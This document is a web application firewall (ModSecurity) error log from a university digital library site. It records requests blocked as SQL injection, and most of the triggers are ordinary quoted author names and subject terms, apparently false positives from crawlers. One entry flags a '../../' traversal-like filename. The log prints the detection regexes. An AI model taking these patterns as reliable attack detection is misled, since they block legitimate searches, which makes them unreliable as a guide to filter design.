[Mon Aug 28 20:31:13.128910 2023] [:error] [pid 51788] [client 47.128.30.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Visualization\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyhocCo-f0AAMpMlAkAAAAJ"]
[Mon Aug 28 20:31:45.640475 2023] [:error] [pid 51745] [client 85.208.96.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Variable viscosity\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyhwcCo-f0AAMohfdkAAAAY"]
[Mon Aug 28 20:34:41.094862 2023] [:error] [pid 51928] [client 85.208.96.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Millman, Jacob\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyiccCo-f0AAMrYueQAAAAR"]
[Mon Aug 28 20:40:44.229348 2023] [:error] [pid 51984] [client 85.208.96.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Farid Esmaeili\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyj3MCo-f0AAMsQZpIAAAAL"]
[Mon Aug 28 20:41:38.856259 2023] [:error] [pid 52129] [client 47.128.25.156] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/DADK01.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOykEsCo-f0AAMuhw4cAAAAZ"]
[Mon Aug 28 20:58:34.256728 2023] [:error] [pid 52428] [client 85.208.96.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Keterampilan Listrik\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyoCsCo-f0AAMzMqrQAAAAN"]
[Mon Aug 28 21:14:46.443192 2023] [:error] [pid 52658] [client 85.208.96.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Moekijat\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyr1sCo-f0AAM2yibwAAAAP"]
[Mon Aug 28 21:53:43.429482 2023] [:error] [pid 53101] [client 52.167.144.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Okiishi, Theodore H.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOy098Co-f0AAM9taGoAAAAX"]
[Mon Aug 28 22:12:32.744018 2023] [:error] [pid 53463] [client 40.77.167.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Tao Zhang\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOy5YMCo-f0AANDXvz8AAAAd"]
[Mon Aug 28 22:37:30.888621 2023] [:error] [pid 53534] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Jaivignesh Jayakumar\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOy-OsCo-f0AANEes08AAAAN"]
[Mon Aug 28 23:23:47.781607 2023] [:error] [pid 54995] [client 52.70.240.171] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Skripsi Teknik Informatika 2021\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzKE8Co-f0AANbTTjoAAAAY"]
[Mon Aug 28 23:43:30.726108 2023] [:error] [pid 55445] [client 85.208.96.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Robert\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzOssCo-f0AANiVu9IAAAAA"]
[Mon Aug 28 23:54:12.507761 2023] [:error] [pid 55493] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Mikael Sugianto\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzRNMCo-f0AANjF0V8AAAAP"]
[Tue Aug 29 00:06:07.725295 2023] [:error] [pid 56120] [client 85.208.96.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22VEER, Van't\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzT-8Co-f0AANs4Sb8AAAAL"]
[Tue Aug 29 00:19:28.040657 2023] [:error] [pid 56416] [client 66.249.70.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Management\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzXIMCo-f0AANxgVT0AAAAM"]
[Tue Aug 29 00:23:00.680184 2023] [:error] [pid 56495] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Pengantar Ilmu\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzX9MCo-f0AANyvkdUAAAAT"]
[Tue Aug 29 00:54:53.752098 2023] [:error] [pid 56918] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Construction activities\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzfbcCo-f0AAN5W5MgAAAAG"]
[Tue Aug 29 00:55:05.349311 2023] [:error] [pid 56826] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Technological forecasting\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzfecCo-f0AAN36EkEAAAAQ"]
[Tue Aug 29 01:38:52.756503 2023] [:error] [pid 57396] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Student perception\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzpvMCo-f0AAOA0wfUAAAAF"]
[Tue Aug 29 01:59:21.250524 2023] [:error] [pid 57470] [client 66.249.70.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Ed Robinson\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzuicCo-f0AAOB@d3QAAAAO"]
[Tue Aug 29 02:37:34.884499 2023] [:error] [pid 58002] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Questionnaire survey\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOz3fsCo-f0AAOKS0R0AAAAC"]
[Tue Aug 29 03:04:06.904451 2023] [:error] [pid 58300] [client 157.55.39.215] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Ilana Stonebraker\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOz9tsCo-f0AAOO8QwwAAAAM"]
[Tue Aug 29 04:43:02.851958 2023] [:error] [pid 59450] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Tahir Mumtaz Malik\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0U5sCo-f0AAOg6IiUAAAAG"]
[Tue Aug 29 05:14:07.457590 2023] [:error] [pid 59624] [client 52.167.144.170] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Creative Thinking\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0cL8Co-f0AAOjoXSgAAAAI"]
[Tue Aug 29 05:47:20.384463 2023] [:error] [pid 60163] [client 217.182.134.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Ant\\xc3\\xb4nio M\\xc3\\xa1rcio Tavares Thom\\xc3\\xa9\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0j@MCo-f0AAOsD2W8AAAAQ"]
[Tue Aug 29 06:30:03.538675 2023] [:error] [pid 60722] [client 40.77.167.242] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Frampton, Kenneth\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0t@8Co-f0AAO0yngQAAAAA"]
[Tue Aug 29 06:35:55.558762 2023] [:error] [pid 60595] [client 85.208.96.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Derwin Suhartono\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0vW8Co-f0AAOyzALUAAAAG"]
[Tue Aug 29 06:47:46.844784 2023] [:error] [pid 60686] [client 85.208.96.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22LX-800\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0yIsCo-f0AAO0Oc7EAAAAM"]
